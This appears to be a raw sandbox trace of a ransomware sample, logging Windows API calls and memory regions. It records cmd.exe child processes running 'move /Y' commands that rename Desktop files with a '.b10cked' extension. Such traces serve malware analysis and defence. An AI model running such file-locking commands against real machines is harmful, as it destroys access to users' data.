lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.198] 
GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.198] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.198] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.199] GetConsoleTitleW (in: lpConsoleTitle=0x2a08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.207] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.208] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.208] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.208] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.209] _wcsicmp (_String1="move", _String2=")") returned 68 [0220.209] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0220.209] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0220.209] _wcsicmp (_String1="IF", _String2="move") returned -4 [0220.209] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0220.209] _wcsicmp (_String1="REM", _String2="move") returned 5 [0220.209] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0220.212] GetConsoleTitleW (in: lpConsoleTitle=0x12f5e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.360] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0220.360] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0220.360] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0220.360] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0220.360] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0220.360] _wcsicmp (_String1="move", _String2="CD") returned 10 [0220.360] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0220.360] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0220.360] _wcsicmp 
(_String1="move", _String2="REN") returned -5 [0220.360] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0220.360] _wcsicmp (_String1="move", _String2="SET") returned -6 [0220.360] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0220.360] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0220.360] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0220.360] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0220.360] _wcsicmp (_String1="move", _String2="MD") returned 11 [0220.360] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0220.360] _wcsicmp (_String1="move", _String2="RD") returned -5 [0220.360] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0220.360] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0220.360] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0220.360] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0220.360] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0220.360] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0220.360] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0220.360] _wcsicmp (_String1="move", _String2="VER") returned -9 [0220.360] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0220.360] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0220.360] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0220.360] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0220.360] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0220.360] _wcsicmp (_String1="move", _String2="START") returned -6 [0220.360] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0220.361] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0220.361] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0220.362] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.362] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.363] GetVolumeInformationW (in: lpRootPathName="C:\\", 
lpVolumeNameBuffer=0x12f39c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f394, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f394*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0220.363] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.364] _wcsnicmp 
(_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0220.364] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0220.365] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0220.365] _wcsicmp (_String1="59NIYO~1.PNG", _String2=".") returned 7 [0220.365] _wcsicmp (_String1="59NIYO~1.PNG", _String2="..") returned 7 [0220.365] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG" (normalized: "c:\\users\\eebsym5\\desktop\\59niyo~1.png")) returned 0x20 [0220.365] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2b1d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.365] SetErrorMode (uMode=0x0) returned 0x0 [0220.365] SetErrorMode (uMode=0x1) returned 0x0 [0220.365] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG", nBufferLength=0x104, lpBuffer=0x12ed24, 
lpFilePart=0x12ed0c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG", lpFilePart=0x12ed0c*="59NIYO~1.PNG") returned 0x25 [0220.365] SetErrorMode (uMode=0x0) returned 0x1 [0220.365] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.365] _wcsicmp (_String1="59NIYO~1.PNG", _String2=".") returned 7 [0220.365] _wcsicmp (_String1="59NIYO~1.PNG", _String2="..") returned 7 [0220.365] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG" (normalized: "c:\\users\\eebsym5\\desktop\\59niyo~1.png")) returned 0x20 [0220.366] SetErrorMode (uMode=0x0) returned 0x0 [0220.366] SetErrorMode (uMode=0x1) returned 0x0 [0220.366] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG", nBufferLength=0x104, lpBuffer=0x12f1a0, lpFilePart=0x12ef38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG", lpFilePart=0x12ef38*="59NIYO~1.PNG") returned 0x25 [0220.366] SetErrorMode (uMode=0x0) returned 0x1 [0220.366] SetErrorMode (uMode=0x0) returned 0x0 [0220.366] SetErrorMode (uMode=0x1) returned 0x0 [0220.366] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png.b10cked", nBufferLength=0x104, lpBuffer=0x12f3a8, lpFilePart=0x12ef38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png.b10cked", lpFilePart=0x12ef38*="59nIYoZ1Klx-.png.b10cked") returned 0x31 [0220.366] SetErrorMode (uMode=0x0) returned 0x1 [0220.366] SetLastError (dwErrCode=0x0) [0220.366] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\59niyoz1klx-.png.b10cked")) returned 0xffffffff [0220.366] GetLastError () returned 0x2 [0220.366] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG", fInfoLevelId=0x1, lpFindFileData=0x12e8b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e8b4) returned 0x2a0ef8 [0220.366] FindNextFileW 
(in: hFindFile=0x2a0ef8, lpFindFileData=0x12e8b4 | out: lpFindFileData=0x12e8b4) returned 0 [0220.367] GetLastError () returned 0x12 [0220.367] FindClose (in: hFindFile=0x2a0ef8 | out: hFindFile=0x2a0ef8) returned 1 [0220.368] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59NIYO~1.PNG", fInfoLevelId=0x1, lpFindFileData=0x2b1ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2b1ae0) returned 0x2a0ef8 [0220.368] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png.b10cked", nBufferLength=0x104, lpBuffer=0x12eb4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png.b10cked", lpFilePart=0x0) returned 0x31 [0220.368] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png", nBufferLength=0x104, lpBuffer=0x12eb4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png", lpFilePart=0x0) returned 0x29 [0220.368] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png" (normalized: "c:\\users\\eebsym5\\desktop\\59niyoz1klx-.png")) returned 0x20 [0220.368] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png" (normalized: "c:\\users\\eebsym5\\desktop\\59niyoz1klx-.png"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\59nIYoZ1Klx-.png.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\59niyoz1klx-.png.b10cked"), dwFlags=0x3) returned 1 [0220.369] FindClose (in: hFindFile=0x2a0ef8 | out: hFindFile=0x2a0ef8) returned 1 [0220.369] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x12eb00 | out: _Buffer=" 1") returned 9 [0220.369] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.369] GetFileType (hFile=0x7) returned 0x2 [0220.369] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.369] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12ea8c | out: lpMode=0x12ea8c) returned 1 [0220.369] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.369] 
GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x12eac0 | out: lpConsoleScreenBufferInfo=0x12eac0) returned 1 [0220.370] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0220.370] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x12eb00 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0220.370] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x12eae4, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x12eae4*=0x1a) returned 1 [0220.370] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.370] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.370] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.370] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.371] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.371] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.371] SetConsoleInputExeNameW () returned 0x1 [0220.371] GetConsoleOutputCP () returned 0x1b5 [0220.371] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.371] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.371] exit (_Code=0) Process: id = "571" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16f20" os_pid = "0xcb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav\" \"C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = 
"CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32874 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32875 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32876 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32877 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 32878 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32879 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32880 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32881 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32882 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" 
Region: id = 32883 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33200 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33201 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33202 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33203 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 33204 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 33205 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33206 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33207 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33208 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33209 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = 
mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33210 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33211 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33212 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33213 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33214 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 33215 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33216 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33217 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33218 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 33219 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = 
"private_0x00000000000e0000" filename = "" Region: id = 33220 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 33221 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 33222 start_va = 0x570000 end_va = 0x116ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 33223 start_va = 0x1170000 end_va = 0x12d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Thread: id = 775 os_tid = 0xeb8 [0220.793] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f99c | out: lpSystemTimeAsFileTime=0x28f99c*(dwLowDateTime=0xb866a3a0, dwHighDateTime=0x1d440a9)) [0220.793] GetCurrentProcessId () returned 0xcb0 [0220.793] GetCurrentThreadId () returned 0xeb8 [0220.794] GetTickCount () returned 0x3d9bb [0220.794] QueryPerformanceCounter (in: lpPerformanceCount=0x28f994 | out: lpPerformanceCount=0x28f994*=27758275082) returned 1 [0220.794] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.794] __set_app_type (_Type=0x1) [0220.794] __p__fmode () returned 0x76b331f4 [0220.794] __p__commode () returned 0x76b331fc [0220.794] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.794] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.794] GetCurrentThreadId () returned 0xeb8 [0220.794] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xeb8) returned 0x38 [0220.795] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.795] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.795] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.795] 
HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.795] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f92c | out: phkResult=0x28f92c*=0x0) returned 0x2 [0220.795] VirtualQuery (in: lpAddress=0x28f963, lpBuffer=0x28f8fc, dwLength=0x1c | out: lpBuffer=0x28f8fc*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.795] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f8fc, dwLength=0x1c | out: lpBuffer=0x28f8fc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.795] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f8fc, dwLength=0x1c | out: lpBuffer=0x28f8fc*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.795] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f8fc, dwLength=0x1c | out: lpBuffer=0x28f8fc*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.795] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f8fc, dwLength=0x1c | out: lpBuffer=0x28f8fc*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0220.795] GetConsoleOutputCP () returned 0x1b5 [0220.795] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.795] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.795] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.795] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.796] _get_osfhandle (_FileHandle=1) returned 
0x7 [0220.796] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.796] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.796] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.796] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.796] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.796] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.796] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.796] GetEnvironmentStringsW () returned 0x370150* [0220.796] FreeEnvironmentStringsW (penv=0x370150) returned 1 [0220.797] GetEnvironmentStringsW () returned 0x370150* [0220.797] FreeEnvironmentStringsW (penv=0x370150) returned 1 [0220.797] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e89c | out: phkResult=0x28e89c*=0x40) returned 0x0 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x0, lpData=0x28e8a8*=0x78, lpcbData=0x28e8a0*=0x1000) returned 0x2 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x4, lpData=0x28e8a8*=0x1, lpcbData=0x28e8a0*=0x4) returned 0x0 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x0, lpData=0x28e8a8*=0x1, lpcbData=0x28e8a0*=0x1000) returned 0x2 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e8a4, lpData=0x28e8a8, lpcbData=0x28e8a0*=0x1000 | out: lpType=0x28e8a4*=0x4, lpData=0x28e8a8*=0x0, lpcbData=0x28e8a0*=0x4) returned 0x0 [0220.797] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", 
